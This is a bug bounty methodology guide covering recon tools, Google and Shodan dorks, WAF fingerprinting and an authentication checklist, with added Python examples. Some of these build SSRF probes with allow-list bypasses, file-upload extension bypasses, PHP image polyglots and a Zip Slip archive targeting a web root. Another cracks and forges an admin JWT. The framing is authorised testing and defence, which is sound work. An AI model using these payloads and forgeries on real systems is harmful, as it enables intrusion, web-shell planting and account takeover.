Bug Bounty
Custom Header Setup
Many programs require you to tag your traffic with an identifying header so the target can tell your testing from real attacks. Burp can add it to every proxied request.
Steps to Add Custom Header in Burp Requests
Select Proxy -> Options (in current Burp releases: Proxy -> Proxy settings, or Settings -> Tools -> Proxy)
Go to Match and Replace and select Add
Specify the details of the match and replace as shown below
Type: Request header
Match: leave blank, so the rule adds a new header instead of rewriting an existing one
Replace: the complete header line, for example X-Bug-Bounty: hacker@bugbounty.site (use the header name and value the program asks for; a bare e-mail address is not a valid header)
Comment: Manually BBP header
Information Gathering
- often blocked by organizations for gray hat searches
- scans less frequently than LeakIX but whitelisted
- best overall scanner but without vulnerability discovery
- Real-time Recon/DNS data for Public Bug Bounty Programs
- automated recon and vulnerability scanner
- tool used to discover exposed hosts on the internet using multiple search engines
- Active Reconnaissance Tool
- collection of bash and python scripts that installs common tools for recon scans and asset discovery
- Nuclei: security check scanner that is based on templates; Get started with Nuclei
- Visually navigate available nuclei templates
- CENT: collect and organize other custom templates
Getting started with some CVE scanning using Nuclei templates:
Mass security testing on subdomains:
Throttle the scan so you stay inside the program's rate rules and do not trip the WAF; nuclei's relevant flags:
```
-rl, -rate-limit int          maximum number of requests to send per second (default 150)
-rlm, -rate-limit-minute int  maximum number of requests to send per minute
```
Combining nuclei scanner with CENT custom templates
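Once a mass scan finishes you are left with a large, repetitive results file. The following is an added example (not code from the original page or from the nuclei project) that triages nuclei's JSON-lines output offline: it skips non-JSON noise, drops duplicate hits, filters by minimum severity and prints a ranked summary. It assumes the results came from a run such as `nuclei -l subdomains.txt -t cves/ -rl 50 -jsonl -o results.jsonl` (`-jsonl` is the v3 flag name; v2 used `-json` for the same format), and the records in `SAMPLE_JSONL` are constructed to mirror nuclei's record layout, not real findings.

```python
"""Triage nuclei JSONL results offline: dedupe, filter by severity, summarize.

Added example, not code from the original page or from the nuclei project.
Assumes results written by: nuclei -l subdomains.txt -t cves/ -rl 50 -jsonl -o results.jsonl
SAMPLE_JSONL is constructed in nuclei's record shape (template-id, info.severity,
host, matched-at) and contains no real findings.
"""
import json
import sys
from collections import Counter

SEVERITY_ORDER = {"unknown": -1, "info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

# Constructed sample output; hosts use the reserved example.com domain.
SAMPLE_JSONL = """\
{"template-id":"tech-detect","info":{"name":"Wappalyzer Technology Detection","severity":"info","tags":["tech"]},"type":"http","host":"https://app.example.com","matched-at":"https://app.example.com/","timestamp":"2024-01-01T10:00:00Z"}
{"template-id":"CVE-2021-44228","info":{"name":"Apache Log4j2 RCE","severity":"critical","tags":["cve","rce"]},"type":"http","host":"https://app.example.com","matched-at":"https://app.example.com/login","timestamp":"2024-01-01T10:00:01Z"}
{"template-id":"CVE-2021-44228","info":{"name":"Apache Log4j2 RCE","severity":"critical","tags":["cve","rce"]},"type":"http","host":"https://app.example.com","matched-at":"https://app.example.com/login","timestamp":"2024-01-01T10:00:02Z"}
{"template-id":"git-config","info":{"name":"Git Config Disclosure","severity":"medium","tags":["exposure","git"]},"type":"http","host":"https://dev.example.com","matched-at":"https://dev.example.com/.git/config","timestamp":"2024-01-01T10:00:03Z"}
[WRN] a stray log line that is not JSON
"""


def parse_nuclei_jsonl(text):
    """One dict per valid JSON record; non-JSON lines (log noise that ends up in a
    redirected stdout) are skipped instead of aborting the triage."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(rec, dict) and "template-id" in rec:
            findings.append(rec)
    return findings


def severity(rec):
    return str((rec.get("info") or {}).get("severity", "unknown")).lower()


def dedupe(findings):
    """Keep the first hit per (template-id, matched-at); nuclei repeats a match when
    several requests in one template fire or when runs are concatenated."""
    seen, unique = set(), []
    for rec in findings:
        key = (rec.get("template-id"), rec.get("matched-at") or rec.get("host"))
        if key not in seen:
            seen.add(key)
            unique.append(rec)
    return unique


def filter_min_severity(findings, min_sev="medium"):
    threshold = SEVERITY_ORDER[min_sev]
    return [r for r in findings if SEVERITY_ORDER.get(severity(r), -1) >= threshold]


def summarize(findings):
    """Count findings per severity, e.g. {'critical': 1, 'medium': 1, 'info': 1}."""
    return Counter(severity(r) for r in findings)


def report_lines(findings):
    """Human-readable lines, most severe first (sorted() is stable, so input order
    is preserved within one severity)."""
    ordered = sorted(findings, key=lambda r: -SEVERITY_ORDER.get(severity(r), -1))
    return [f"[{severity(r)}] {r['template-id']} {r.get('matched-at') or r.get('host')}"
            for r in ordered]


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_JSONL
    unique = dedupe(parse_nuclei_jsonl(text))
    print(dict(summarize(unique)))
    print("\n".join(report_lines(filter_min_severity(unique, "medium"))))
```

Run it as `python3 triage.py results.jsonl`; without an argument it runs over the constructed sample. Deduplicating on `matched-at` rather than `host` keeps one line per affected URL, which is the granularity most programs want in a report.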
Google dorks (site: takes a bare domain, not a URL with a scheme):
- Exposed .git directories in directory listings: intitle:"index of /.git/"
- Files with the .git extension: allintext:index filetype:git
- PHP pages with an id parameter (injection candidates): inurl:"index.php?id="
- PHP admin dashboards: inurl:"admin/dashboard.php" site:.com
- Admin login pages: intitle:"login" "admin" site:site.com
- Exposed Apache .htaccess in directory listings: intitle:"Index of /" .htaccess site:site.com
- Possible contact forms: site:website.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contact_us" | inurl:"contact_form" | inurl:"contact-form"
- SSRF-prone parameters: inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com
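The dork above only finds pages whose URLs contain those parameter names; once you have a list of crawled or dorked URLs you still have to decide which parameters are worth a probe. The following added example (not code from the original page) does that triage offline: it flags parameters by name (the list from the dork, extended with a few common redirect/fetch names) and by value (anything that already looks like a URL, path or hostname), then builds the three probe variants a tester usually sends first. `SAMPLE_URLS` are constructed on the reserved example.com domain and `CALLBACK` is a placeholder for your own OAST/collaborator host; nothing here sends traffic.

```python
"""Pick out URL parameters worth probing for SSRF / open redirect and build probes.

Added example, not code from the original page. PRONE_NAMES extends the dork's
parameter names; SAMPLE_URLS are constructed inputs; CALLBACK is a placeholder
for your own out-of-band host. No requests are sent.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlparse, urlunparse

PRONE_NAMES = {"url", "path", "dest", "html", "data", "domain", "page", "redirect",
               "next", "return", "uri", "src", "callback", "feed", "site", "host", "file"}
CALLBACK = "http://oast.example.net/"  # placeholder for your collaborator host (assumption)

# Value looks like a hostname, optionally followed by a port or path.
HOSTLIKE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}(?:[/:].*)?$", re.I)

SAMPLE_URLS = [
    "https://app.example.com/fetch?url=https://cdn.example.com/a.png",
    "https://app.example.com/view?page=about",
    "https://app.example.com/render?template=//static.example.com/x.html",
    "https://app.example.com/search?q=ssrf&lang=en",
    "https://app.example.com/go?next=/account",
]


def suspicious_value(value):
    """True when the value is a URL, a scheme-relative or absolute path, or a bare host."""
    v = value.strip()
    return v.startswith(("http://", "https://", "//", "/", "\\\\")) or bool(HOSTLIKE.match(v))


def find_prone_params(urls):
    """One hit per parameter that matches by name, by value, or both."""
    hits = []
    for url in urls:
        parsed = urlparse(url)
        for name, value in parse_qsl(parsed.query, keep_blank_values=True):
            by_name = name.lower() in PRONE_NAMES or name.lower().endswith(("url", "uri"))
            by_value = suspicious_value(value)
            if by_name or by_value:
                reason = "name+value" if by_name and by_value else ("name" if by_name else "value")
                hits.append({"url": url, "param": name, "value": value, "reason": reason})
    return hits


def probe_urls(hit, callback=CALLBACK):
    """Rebuild the URL with the flagged parameter pointed at: the callback host
    (out-of-band SSRF), loopback (internal SSRF), and a userinfo-style URL that
    keeps the original host before '@' (defeats naive startswith allow-lists)."""
    parsed = urlparse(hit["url"])
    variants = [
        callback,
        "http://127.0.0.1/",
        f"https://{parsed.hostname}@{urlparse(callback).netloc}/",
    ]
    probes = []
    for variant in variants:
        query = [(k, variant if k == hit["param"] else v)
                 for k, v in parse_qsl(parsed.query, keep_blank_values=True)]
        probes.append(urlunparse(parsed._replace(query=urlencode(query))))
    return probes


if __name__ == "__main__":
    for hit in find_prone_params(SAMPLE_URLS):
        print(hit["reason"], hit["param"], hit["url"])
        for probe in probe_urls(hit):
            print("   ", probe)
```

Matching on the value as well as the name is what catches `template=//static.example.com/x.html`, a parameter no name list would flag but one that clearly makes the server fetch something.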
Shodan queries:
- Jenkins instances in .gov: hostname:".gov" product:"Jenkins" 200
- All SSL services presenting a certificate issued for *.google.com, with an HTTP 200 in the banner: ssl.cert.subject.CN:"*.google.com" 200
- All SSL certificates issued by the DoD CA, with an HTTP 200 in the banner: ssl.cert.issuer.cn:"DOD SW CA-60" 200
The trailing 200 is a free-text match on the banner; http.status:200 is the precise filter when you only want that response code.
Defense Evasion
Attempt to bypass application protections such as Cloudflare, Akamai, etc.
Check whether the application sits behind a WAF or CDN before testing: response headers and cookies usually identify the vendor, and a 403/429 on a harmless request means the edge, not the origin, answered.
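The check above is normally done by eye in Burp. The following added example (not code from the original page) does it from a single captured response: it scores the well-known header and cookie markers of the common edges (the same class of signal wafw00f relies on) and flags responses that look like the edge's block page rather than the application. `RESPONSES` are constructed, not captured from real hosts.

```python
"""Fingerprint a WAF/CDN edge from one HTTP response, offline.

Added example, not code from the original page. Markers are the vendors' public
header/cookie signals; RESPONSES are constructed, not captured from real hosts.
"""

# (vendor, {header: required substring or None for "present"}, cookie-name prefixes)
SIGNATURES = [
    ("Cloudflare", {"cf-ray": None, "server": "cloudflare", "cf-cache-status": None},
     ["__cfduid", "__cf_bm", "cf_clearance"]),
    ("Akamai", {"server": "akamaighost", "x-akamai-transformed": None}, []),
    ("Imperva Incapsula", {"x-iinfo": None, "x-cdn": "incapsula"}, ["visid_incap_", "incap_ses_"]),
    ("Sucuri", {"x-sucuri-id": None, "server": "sucuri/cloudproxy"}, []),
    ("AWS CloudFront", {"x-amz-cf-id": None, "via": "cloudfront"}, []),
]

# Vendor block-page fragments, lower-cased for matching.
BLOCK_PAGE_MARKERS = ["attention required! | cloudflare", "incapsula incident id"]

# Constructed responses: name -> (status, headers, body)
RESPONSES = {
    "cf": (403, {"Server": "cloudflare", "CF-RAY": "8a1b2c3d4e5f6789-AMS",
                 "Set-Cookie": "__cf_bm=abc; Path=/; HttpOnly", "Content-Type": "text/html"},
           "<title>Attention Required! | Cloudflare</title>"),
    "akamai": (200, {"Server": "AkamaiGHost", "Content-Type": "text/html"}, "<html>ok</html>"),
    "origin": (200, {"Server": "nginx/1.24.0", "Content-Type": "text/html"}, "<html>ok</html>"),
}


def fingerprint(headers):
    """[(vendor, matched_signal_count)] sorted strongest first; [] if nothing matched."""
    lowered = {k.lower(): str(v).lower() for k, v in headers.items()}
    cookies = lowered.get("set-cookie", "")
    found = []
    for vendor, header_sigs, cookie_sigs in SIGNATURES:
        score = 0
        for header, needle in header_sigs.items():
            value = lowered.get(header)
            if value is not None and (needle is None or needle in value):
                score += 1
        score += sum(1 for c in cookie_sigs if c in cookies)
        if score:
            found.append((vendor, score))
    return sorted(found, key=lambda item: -item[1])


def looks_blocked(status, body):
    """'The edge answered, not the app': a deny/throttle status or a known block page."""
    return status in (403, 406, 418, 429, 503) or any(m in body.lower() for m in BLOCK_PAGE_MARKERS)


def assess(status, headers, body):
    vendors = fingerprint(headers)
    return {"waf": vendors[0][0] if vendors else None,
            "blocked": looks_blocked(status, body),
            "candidates": vendors}


if __name__ == "__main__":
    for name, (status, headers, body) in RESPONSES.items():
        print(name, assess(status, headers, body))
```

A vendor match with `blocked: True` on a benign request is the signal to slow down (see the nuclei rate-limit flags above) or to look for the origin IP rather than keep hammering the edge.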
Authentication:
- Registration
- Input validation
- Analysis
- Misc
- Password reset process
- Password reset tokens (expiration/reuse)
- Failed retry lockout (DoS)
- Password policies
- Update profile information without asking password
- Default or easy to guess keys
- User enumeration
- HTTP Authentication
- Authentication Bypass
- Identify weak authentication channels (find the primary mechanism, then identify secondary mechanisms / methods [Mobile App, Call Center, SSO])
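Two of the checklist items, reset-token expiration/reuse and easy-to-guess keys, are easier to test when you know what a correct implementation looks like. The following added example (not code from the original page) puts a predictable token scheme next to a hardened one: the weak token is a function of username and timestamp, so an attacker who knows roughly when the reset e-mail was sent can enumerate it offline; the hardened store issues random tokens, keeps only their hash, expires them after 15 minutes and deletes them on first use. Users and clock values are constructed; the injectable `now` exists only so expiry can be exercised without sleeping.

```python
"""Password-reset tokens: a predictable scheme next to a hardened one.

Added example, not code from the original page. Shows the properties the
checklist tells you to test (expiry, single use, unguessability). Users and
clock values are constructed; nothing talks to a real application.
"""
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60


def weak_token(user, issued_at):
    """Anti-pattern: token is a pure function of public data (username + second)."""
    return hashlib.md5(f"{user}:{issued_at}".encode()).hexdigest()


def guess_weak_token(user, observed_token, around_ts, window=600):
    """Attacker side: the reset mail time is known to the minute, so brute-force the
    timestamp over a small window and recover the token issued for the victim."""
    for ts in range(around_ts - window, around_ts + window + 1):
        if weak_token(user, ts) == observed_token:
            return ts
    return None


class ResetTokenStore:
    """Hardened scheme: random token, stored only as its SHA-256, 15-minute expiry,
    removed on first use whether or not it validates (an expired token cannot be
    retried later either). `now` is injectable so expiry can be tested."""

    def __init__(self, now=time.time):
        self._now = now
        self._entries = {}  # sha256(token) -> (user, expires_at)

    @staticmethod
    def _key(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user):
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._entries[self._key(token)] = (user, self._now() + TOKEN_TTL_SECONDS)
        return token

    def consume(self, token):
        """The user the token was issued to, or None. Lookup is by digest, so the
        stored value is never compared byte-by-byte against attacker input."""
        entry = self._entries.pop(self._key(token), None)
        if entry is None:
            return None
        user, expires_at = entry
        if self._now() > expires_at:
            return None
        return user


if __name__ == "__main__":
    t0 = 1_700_000_000
    print("weak token timestamp recovered:",
          guess_weak_token("alice", weak_token("alice", t0 + 42), t0))
    store = ResetTokenStore()
    token = store.issue("alice")
    print("first use:", store.consume(token), "second use:", store.consume(token))
```

When testing a live target, the same three observations apply: request two resets and see whether the older token still works, wait past the advertised lifetime, and compare tokens issued seconds apart for structure that a wordlist or timestamp sweep could reproduce.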
Authorization:
Session:
General:
File Upload:
Extensions Impact
- ASP, ASPX, PHP5, PHP, PHP3: Webshell, RCE
- SVG: Stored XSS, SSRF, XXE
- GIF: Stored XSS, SSRF
- CSV: CSV injection
- XML: XXE
- AVI: LFI, SSRF
- HTML, JS: HTML injection, XSS, Open redirect
- PNG, JPEG: Pixel flood attack (DoS)
- ZIP: RCE via LFI, DoS
- PDF, PPTX: SSRF, Blind XXE
Blacklisting Bypass
- PHP → .phtm, .phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
- ASP → .asp, .aspx, .cer, .asa
- JSP → .jsp, .jspx, .jsw, .jsv, .jspf
- ColdFusion → .cfm, .cfml, .cfc, .dbm
- Using random capitalization → .pHp, .pHP5, .PhAr
Whitelisting Bypass
- file.jpg.php
- file.php.jpg
- file.php.blah123jpg
- file.php%00.jpg
- file.php\x00.jpg (this can be done while uploading the file too: name it file.phpD.jpg and change the D (0x44) to 0x00 in the hex view of the intercepted request)
- file.php%00
- file.php%20
- file.php%0d%0a.jpg
- file.php.....
- file.php/
- file.php.\
- file.php#.png
- file.
- .html
Misc
- Uploading file.js & file.config (web.config)
- Pixel flood attack using image
- DoS with a very long file name: 1234...99.png
- Zip Slip / zip:// wrapper: if a site accepts .zip files, put a .php file into a .zip and upload it. If the application has an include-style parameter, visit site.com/path?page=zip://path/file.zip%23rce.php so that PHP's zip:// stream wrapper reads rce.php out of the archive. Zip Slip proper is the related case where an entry inside the archive is named with traversal (../../shell.php) and an unsafe extractor writes it outside the upload directory.
- Image Shell: Exiftool is a great tool to view and manipulate EXIF data (for example to plant PHP in a comment field of a real image). Then rename the file: mv pic.jpg pic.php.jpg
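The whitelist-bypass names, the image-shell trick and the two zip techniques above are all test artefacts you end up building by hand. The following added example (not code from the original page) generates them: the bypass filenames in the order listed (plus the alternate extensions and a mixed-case variant), a GIF and a JPEG polyglot carrying a PHP probe (the JPEG uses a COM segment, the same idea as writing PHP into a comment field with exiftool), a plain archive for the zip:// wrapper trick and a Zip Slip archive with a traversal entry, together with the check a safe extractor must perform. The probe, names and target path are placeholders for a lab you own.

```python
"""Generate file-upload test cases for the bypasses listed above.

Added example, not code from the original page. Builds bypass filenames, GIF/JPEG
polyglots with a PHP probe, a zip:// wrapper archive and a Zip Slip archive, and
the entry check an extractor must do. Probe, names and paths are lab placeholders.
"""
import io
import posixpath
import zipfile

ALT_EXTS = {
    "php": ["phtm", "phtml", "phps", "pht", "php2", "php3", "php4", "php5", "shtml",
            "phar", "pgif", "inc"],
    "asp": ["asp", "aspx", "cer", "asa"],
    "jsp": ["jsp", "jspx", "jsw", "jsv", "jspf"],
    "cfm": ["cfm", "cfml", "cfc", "dbm"],
}
# Harmless marker payload; only ever upload it to systems you are authorised to test.
PHP_PROBE = b"<?php echo 'upload-probe:' . php_uname('n'); ?>"


def mixed_case(ext):
    """pHp-style alternating case, for case-sensitive blacklists."""
    return "".join(c.upper() if i % 2 else c for i, c in enumerate(ext))


def bypass_names(base="file", ext="php", allowed="jpg"):
    """Candidate filenames in the order listed on this page, then alternate
    extensions and a mixed-case variant. A raw NUL is used for multipart
    filenames; '%00' is its URL-encoded form for filename-in-query cases."""
    names = [
        f"{base}.{allowed}.{ext}", f"{base}.{ext}.{allowed}", f"{base}.{ext}.blah123{allowed}",
        f"{base}.{ext}%00.{allowed}", f"{base}.{ext}\x00.{allowed}", f"{base}.{ext}%00",
        f"{base}.{ext}%20", f"{base}.{ext}%0d%0a.{allowed}", f"{base}.{ext}.....",
        f"{base}.{ext}/", f"{base}.{ext}.\\", f"{base}.{ext}#.{allowed}",
    ]
    names += [f"{base}.{alt}" for alt in ALT_EXTS.get(ext, [])]
    names.append(f"{base}.{mixed_case(ext)}")
    return list(dict.fromkeys(names))  # drop duplicates, keep order


def gif_polyglot(payload=PHP_PROBE):
    """Passes magic-byte / MIME-sniffing checks; not a decodable image."""
    return b"GIF89a" + payload


def jpeg_comment_polyglot(payload=PHP_PROBE):
    """Minimal JPEG: SOI, a COM segment holding the payload, EOI. The 2-byte length
    counts itself. Enough for header checks; servers that fully decode or
    re-encode images need a real photo edited with exiftool instead."""
    length = len(payload) + 2
    return b"\xff\xd8" + b"\xff\xfe" + length.to_bytes(2, "big") + payload + b"\xff\xd9"


def zip_with_entries(entries):
    """Archive from (name, bytes) pairs. zipfile stores entry names verbatim, so a
    name like ../../x survives (which is exactly what makes Zip Slip possible).
    With a normal entry such as rce.php this is the archive for the zip:// trick."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, data in entries:
            archive.writestr(name, data)
    return buf.getvalue()


def zip_slip_archive(payload=PHP_PROBE, target="../../var/www/html/shell.php"):
    """Benign-looking archive whose second entry escapes the extraction directory
    (target is a placeholder for the lab's web root)."""
    return zip_with_entries([("README.txt", b"nothing to see"), (target, payload)])


def zip_slip_entries(zip_bytes):
    """Entry names an extractor must reject: absolute, backslash-separated, or
    normalising to a path that starts with '..'."""
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            normalised = posixpath.normpath(name)
            if name.startswith(("/", "\\")) or "\\" in name or normalised.startswith(".."):
                suspicious.append(name)
    return suspicious


if __name__ == "__main__":
    print("\n".join(bypass_names()))
    print(zip_slip_entries(zip_slip_archive()))
```

`zip_slip_entries` is also the check to look for when reviewing an application's own extraction code: if nothing normalises entry names before joining them to the destination directory, the archive from `zip_slip_archive` lands wherever `target` points.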
Adobe Experience Manager (AEM) Configuration Testing
Shodan Dork:
http.component:"Adobe Experience Manager"
Daily updated Text file of all domains within scope on active Bug Bounty Programs
Sensitive Information Exposure methods
Use gitdumper.sh or
Worth a shot to use the tool by @
Convert JWT to a format crackable by John python3
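Converting the token for John is one route; hashcat mode 16500 takes the raw JWT directly, and for a small wordlist the check is simple enough to do in place. The following added example (not code from the original page) recomputes HMAC-SHA256 over `header.payload` for each candidate secret, compares it with the signature, and once the secret is known re-signs the token with modified claims. It refuses non-HS256 tokens, since brute-forcing an RS256 signature this way is pointless. The token, secret and wordlist are constructed for the example.

```python
"""Crack and re-sign an HS256 JWT against a wordlist, in pure Python.

Added example, not code from the original page. Equivalent to feeding the
token to hashcat -m 16500 or John via a converter; token, secret and wordlist
are constructed.
"""
import base64
import hashlib
import hmac
import json


def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign_hs256(header, payload, secret):
    """Compact JWT with an HS256 signature (RFC 7515 encoding rules)."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def verify_hs256(token, secret):
    h, p, s = token.split(".")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def crack_hs256(token, wordlist):
    """First candidate secret that reproduces the signature, else None."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        raise ValueError("not an HS256 token")
    message = f"{h}.{p}".encode()
    target = b64url_decode(s)
    for candidate in wordlist:
        digest = hmac.new(candidate.encode(), message, hashlib.sha256).digest()
        if hmac.compare_digest(digest, target):
            return candidate
    return None


def forge_hs256(token, secret, changes):
    """Re-sign the token with modified claims once the secret is known."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    payload.update(changes)
    return sign_hs256(header, payload, secret)


def claims(token):
    return json.loads(b64url_decode(token.split(".")[1]))


# Constructed sample: a token signed with a weak secret, and a tiny wordlist.
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "1234", "role": "user"}, "secret123")
WORDLIST = ["password", "changeme", "secret", "secret123", "admin"]

if __name__ == "__main__":
    found = crack_hs256(SAMPLE_TOKEN, WORDLIST)
    print("secret:", found)
    if found:
        print("forged:", forge_hs256(SAMPLE_TOKEN, found, {"role": "admin"}))
```

For real wordlists use hashcat; the point of the pure-Python version is that a forged token that the target accepts is the proof a triager needs, and `forge_hs256` produces it in one step.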
Check whether an S3 bucket accepts anonymous writes or listing (unsigned requests):
```
aws s3 cp test.txt s3://target --no-sign-request
aws s3 ls s3://target --no-sign-request
```
Abusing the "Upload from URL" feature: the server fetches the URL you supply (an SSRF candidate in itself), and if the resulting image is saved on a public page you can also point it at a URL on a server you control and log information about every visitor.
Resources
Dump In-scope Assets from BBPs using repo from
from with beginner explanation
nuclei is a tool for detecting vulnerabilities and misconfigurations in web applications. The -as flag (-automatic-scan) runs wappalyzer-based technology detection against each target and then selects the templates whose tags match the detected technologies, instead of a fixed template set. The -silent flag suppresses the banner and progress output so only findings are printed, and the -o flag specifies an output file for the results. The input for this command is the list of IP addresses and ports extracted from the Shodan search results.
nrich (Shodan's CLI) looks IP addresses up in Shodan's InternetDB and reports open ports, hostnames, CPEs and known CVEs without sending packets to the hosts. The input is the list of IP addresses extracted from the Shodan search results (bare IPs, one per line, not ip:port pairs), and the - argument tells the tool to read the input from standard input (stdin). The results are written to the file testing_nrich.out.
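Both commands above start from "the list of IP addresses and ports extracted from the Shodan search results", which is a small transformation that is easy to get wrong (nrich wants bare IPs, nuclei wants scheme://host:port). The following added example (not code from the original page, nor from Shodan's tooling) does it from a `shodan download` export, which is JSON lines with one banner per line carrying the standard `ip_str`, `port`, `transport`, `hostnames` and, for TLS services, `ssl` fields. `SAMPLE_BANNERS` is constructed in that shape using reserved example addresses.

```python
"""Turn a Shodan JSONL export into target lists for nuclei and nrich.

Added example, not code from the original page or Shodan's tooling. Assumes
`shodan download` banner records (ip_str, port, transport, hostnames, ssl).
SAMPLE_BANNERS is constructed with reserved example addresses.
"""
import json

SAMPLE_BANNERS = """\
{"ip_str":"198.51.100.10","port":443,"transport":"tcp","hostnames":["ci.example.com"],"ssl":{"cert":{"subject":{"CN":"ci.example.com"}}},"product":"Jenkins"}
{"ip_str":"198.51.100.10","port":8080,"transport":"tcp","hostnames":["ci.example.com"],"product":"Jenkins"}
{"ip_str":"203.0.113.5","port":80,"transport":"tcp","hostnames":[],"product":"nginx"}
{"ip_str":"203.0.113.5","port":53,"transport":"udp","hostnames":[]}
"""


def parse_banners(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def nuclei_targets(banners):
    """scheme://host:port lines: prefer the hostname (virtual-host routing), choose
    https when the banner has an ssl block, skip non-TCP services."""
    targets = []
    for b in banners:
        if b.get("transport", "tcp") != "tcp":
            continue
        host = (b.get("hostnames") or [b["ip_str"]])[0]
        scheme = "https" if "ssl" in b else "http"
        targets.append(f"{scheme}://{host}:{b['port']}")
    return list(dict.fromkeys(targets))


def nrich_targets(banners):
    """nrich takes bare IPs, one per line; deduplicate across ports."""
    return list(dict.fromkeys(b["ip_str"] for b in banners))


if __name__ == "__main__":
    banners = parse_banners(SAMPLE_BANNERS)
    print("\n".join(nuclei_targets(banners)))   # -> targets.txt for nuclei -l
    print("\n".join(nrich_targets(banners)))    # -> ips.txt for nrich - < ips.txt
```

Feeding the hostname rather than the IP to nuclei matters on shared hosting and behind load balancers: the IP alone often returns a default vhost and the interesting application never gets scanned.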